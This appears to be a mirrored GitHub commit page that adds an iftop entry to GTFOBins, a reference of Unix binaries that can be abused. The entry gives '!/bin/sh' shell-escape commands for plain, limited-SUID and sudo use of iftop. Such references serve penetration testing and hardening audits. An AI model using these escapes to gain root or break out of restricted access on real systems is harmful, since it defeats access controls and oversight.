mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add iftop
This commit is contained in:
parent
c37da57373
commit
26ea00d78a
16
_gtfobins/iftop.md
Normal file
16
_gtfobins/iftop.md
Normal file
@ -0,0 +1,16 @@
|
||||
---
|
||||
description: This requires `iftop` 1.17 and the privilege to capture on some device (specify with `-i` if needed) .
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
iftop
|
||||
!/bin/sh
|
||||
limited-suid:
|
||||
- code: |
|
||||
./iftop
|
||||
!/bin/sh
|
||||
sudo:
|
||||
- code: |
|
||||
sudo iftop
|
||||
!/bin/sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user